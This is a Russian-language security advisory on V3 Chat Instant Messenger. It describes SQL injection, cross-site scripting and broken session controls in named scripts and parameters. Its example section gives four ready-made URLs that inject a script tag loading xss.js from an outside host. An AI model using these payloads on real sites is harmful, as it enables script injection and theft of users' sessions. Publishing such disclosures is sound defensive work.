Программа: V3 Chat Instant Messenger
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, обойти ограничения безопасности и выполнить произвольные SQL команды в базе данных приложения.
1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии mail/index.php, и в параметре "membername" в сценарии members/online.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "login_id" в сценарии members/is_online.php, и в параметре "membername" в сценарии members/profileview.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
3. Уязвимость существует из-за недостаточной обработки входных данных в полях "aboutme" и "hobbies" во время редактирования профиля пользователя. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
4. Уязвимость существует из-за недостаточной аутентификации и управления сессиями. Удаленный авторизованный пользователь может путем изменения значения параметра "membername" манипулировать данными других пользователей.
Пример:
http://www.example.com/v3chat/mail/index.php?action=read& mid=62&id=1<IMG%20"""><SCRIPT%20SRC= http://youfucktard.com/xss.js></SCRIPT>">
http://www.example.com/v3chat/mail/reply.php?&recipientname= Scorpio&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
http://www.example.com/v3chat/members/is_online.php? membername=demo&action=update&login_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
http://www.example.com/messenger/online.php?action=update& membername=luny666&site_id=<IMG%20"""> <SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">
